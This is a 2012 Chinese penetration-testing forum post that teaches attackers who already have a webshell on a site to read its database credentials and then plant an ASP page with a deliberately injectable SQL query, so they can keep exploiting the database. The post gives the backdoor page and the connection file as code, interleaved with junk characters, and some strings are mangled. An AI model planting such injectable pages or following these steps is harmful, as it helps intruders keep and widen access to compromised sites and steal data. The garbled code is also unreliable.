中国网络渗透测试联盟

标题: 自己构造注入点方便入侵 [打印本页]

作者: admin    时间: 2012-9-13 17:27
标题: 自己构造注入点方便入侵
自己构造注入点方便入侵
- \) |) o) j# L- U; _0 N4 R5 A) L) ~: {
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
6 H4 C. J. N7 Z$ I! _+ W/ s4 C: r% Z! @6 D" P
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!2 h5 i0 e/ d7 A5 o% d' [
6 E. w' h& e; `; Z! S
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
( L. U% ?6 D* o1 F: k% `' E% s8 p  Q, u( `' G
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
% o8 N& Z6 `* e6 V* I, t4 z
6 T" ?$ E7 d7 _. ]因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
: ~" k: ?: n$ m6 }% j3 {- i/ D. H: D1 B
程序代码
0 j4 D! X6 A- d; z8 V( P. r<!--#include file="xx.asp"-->- {7 A+ T) s* i* g* O3 S& t( O
<%0 C/ U# {2 e, m) D
set rs=server.createobject("ADODB.recordset")
. m' K* c' {# x5 oid = request("id")
" j) C  x  o; T2 E" t0 o" [strSQL = "select * from admin where id=" & id- f& F4 j: s) z% V2 M# O% ]% |
rs.open strSQL,conn,1,37 z! U! i, ?0 r4 M
rs.close
7 W, h, x. x' O( Y5 X& |2 V%>
8 O; \( V: y! e7 C7 e2 b# P- A7 a. @2 i8 y6 i) E. A
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
& b2 t! K( {7 M5 f: F, U7 s. h) F! p& M7 p
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!. j- l$ M9 G! `

: N) G) i+ f6 w) E$ B& i9 z+ Q6 u7 r然后就要构造一个连接数据库的文件了,代码如下:
% C7 x% P. _0 T1 h" G程序代码
+ k3 t1 l: {5 A4 q# K- y1 p<%        * ?1 c  U, B! X/ i& r. j" i1 P7 |
strSQLServerName = "000.000.000.000"     '服务器名称或地址
( U+ A/ p4 ^, v- y3 C) x$ M  IstrSQLDBUserName = "sqlname"         '数据库帐号% C* I- h. C/ q0 q4 G1 m
strSQLDBPassword = "sqlpass"         '数据库密码
+ M, Y8 f0 I: l# W- [strSQLDBName = "sqldataname"           '数据库名称
+ {0 `( ^* b1 s/ f! ?Set conn = Server.CreateObject("ADODB.Connection")  t# s6 n( R& i  j
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
; Z1 t" U' Z1 o) x8 E6 Wconn.open strCon. S. A+ x% w$ r8 |3 s( l' W( Y
%>
# j) s! M" G) T8 U7 H- o; K7 N
' I+ G- p+ N0 G3 w. L+ D9 E这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,$ U9 B% `( W9 R3 v5 j
* I" W6 D- M  v$ y9 `
就这样,正常情况下,就OK了,伪造成功……8 Q0 W9 ?7 |! ~& ^4 T
) o! q+ L% B+ `, ?# M3 @
           如果有什么问题可以提出来大家一起探讨解决。




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2